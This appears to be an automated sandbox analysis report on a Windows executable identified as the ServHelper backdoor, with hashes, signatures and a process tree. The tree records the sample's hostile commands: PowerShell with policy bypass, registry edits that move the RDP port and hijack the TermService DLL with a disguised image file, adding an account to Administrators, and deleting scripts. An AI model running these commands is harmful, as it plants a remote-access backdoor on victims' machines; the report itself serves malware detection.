Analysis
-
max time kernel
87s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en -
submitted
10-09-2021 15:37
Static task
static1
Behavioral task
behavioral1
Sample
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
Resource
win10-en
0 signatures
0 seconds
General
-
Target
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
-
Size
4.0MB
-
MD5
9cadcadb612787dc6c2e9901ffe49dec
-
SHA1
dfaeffadd7767ea23cabc31a59ae2cd461abf00f
-
SHA256
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb
-
SHA512
e7d908a73e85965359169b9d3e14ec3f1f81218354aa09a8d6c027be230e30c4f334122b933579ce6ad35e5eaffc01c6d8124e5f1a11671b7f6b36549d55beff
Score
10/10
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3056 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe 69 PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe 69 PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe 69 PID 4796 wrote to memory of 4984 4796 powershell.exe 71 PID 4796 wrote to memory of 4984 4796 powershell.exe 71 PID 4796 wrote to memory of 4984 4796 powershell.exe 71 PID 4984 wrote to memory of 5012 4984 csc.exe 72 PID 4984 wrote to memory of 5012 4984 csc.exe 72 PID 4984 wrote to memory of 5012 4984 csc.exe 72 PID 4796 wrote to memory of 1836 4796 powershell.exe 73 PID 4796 wrote to memory of 1836 4796 powershell.exe 73 PID 4796 wrote to memory of 1836 4796 powershell.exe 73 PID 4796 wrote to memory of 3336 4796 powershell.exe 75 PID 4796 wrote to memory of 3336 4796 powershell.exe 75 PID 4796 wrote to memory of 3336 4796 powershell.exe 75 PID 4796 wrote to memory of 2652 4796 powershell.exe 77 PID 4796 wrote to memory of 2652 4796 powershell.exe 77 PID 4796 wrote to memory of 2652 4796 powershell.exe 77 PID 4796 wrote to memory of 4440 4796 powershell.exe 79 PID 4796 wrote to memory of 4440 4796 powershell.exe 79 PID 4796 wrote to memory of 4440 4796 powershell.exe 79 PID 4796 wrote to memory of 3056 4796 powershell.exe 80 PID 4796 wrote to memory of 3056 4796 powershell.exe 80 PID 4796 wrote to memory of 3056 4796 powershell.exe 80 PID 4796 wrote to memory of 4220 4796 powershell.exe 81 PID 4796 wrote to memory of 4220 4796 powershell.exe 81 PID 4796 wrote to memory of 4220 4796 powershell.exe 81 PID 4796 wrote to memory of 4596 4796 powershell.exe 82 PID 4796 wrote to memory of 4596 4796 powershell.exe 82 PID 4796 wrote to memory of 4596 4796 powershell.exe 82 PID 4596 wrote to memory of 2824 4596 net.exe 83 PID 4596 wrote to memory of 2824 4596 net.exe 83 PID 4596 wrote to memory of 2824 4596 net.exe 83 PID 4796 wrote to memory of 2628 4796 powershell.exe 84 PID 4796 wrote to memory of 2628 4796 powershell.exe 84 PID 4796 wrote to memory of 2628 4796 powershell.exe 84 PID 2628 wrote to memory of 4136 2628 cmd.exe 85 PID 2628 wrote to memory of 4136 2628 cmd.exe 85 PID 2628 wrote to memory of 4136 2628 cmd.exe 85 PID 4136 wrote to memory of 3636 4136 cmd.exe 86 PID 4136 wrote to memory of 3636 4136 cmd.exe 86 PID 4136 wrote to memory of 3636 4136 cmd.exe 86 PID 3636 wrote to memory of 648 3636 net.exe 87 PID 3636 wrote to memory of 648 3636 net.exe 87 PID 3636 wrote to memory of 648 3636 net.exe 87 PID 4796 wrote to memory of 1016 4796 powershell.exe 88 PID 4796 wrote to memory of 1016 4796 powershell.exe 88 PID 4796 wrote to memory of 1016 4796 powershell.exe 88 PID 1016 wrote to memory of 4636 1016 cmd.exe 89 PID 1016 wrote to memory of 4636 1016 cmd.exe 89 PID 1016 wrote to memory of 4636 1016 cmd.exe 89 PID 4636 wrote to memory of 4376 4636 cmd.exe 90 PID 4636 wrote to memory of 4376 4636 cmd.exe 90 PID 4636 wrote to memory of 4376 4636 cmd.exe 90 PID 4376 wrote to memory of 3932 4376 net.exe 91 PID 4376 wrote to memory of 3932 4376 net.exe 91 PID 4376 wrote to memory of 3932 4376 net.exe 91 PID 4796 wrote to memory of 5032 4796 powershell.exe 93 PID 4796 wrote to memory of 5032 4796 powershell.exe 93 PID 4796 wrote to memory of 5032 4796 powershell.exe 93 PID 4796 wrote to memory of 5036 4796 powershell.exe 94 PID 4796 wrote to memory of 5036 4796 powershell.exe 94 PID 4796 wrote to memory of 5036 4796 powershell.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe"C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rlmeisxk\rlmeisxk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7F7.tmp" "c:\Users\Admin\AppData\Local\Temp\rlmeisxk\CSC4A66E73C306D4AD9B2C12ABD8513448.TMP"4⤵PID:5012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4220
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:648
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3932
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:5032
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:5036
-
-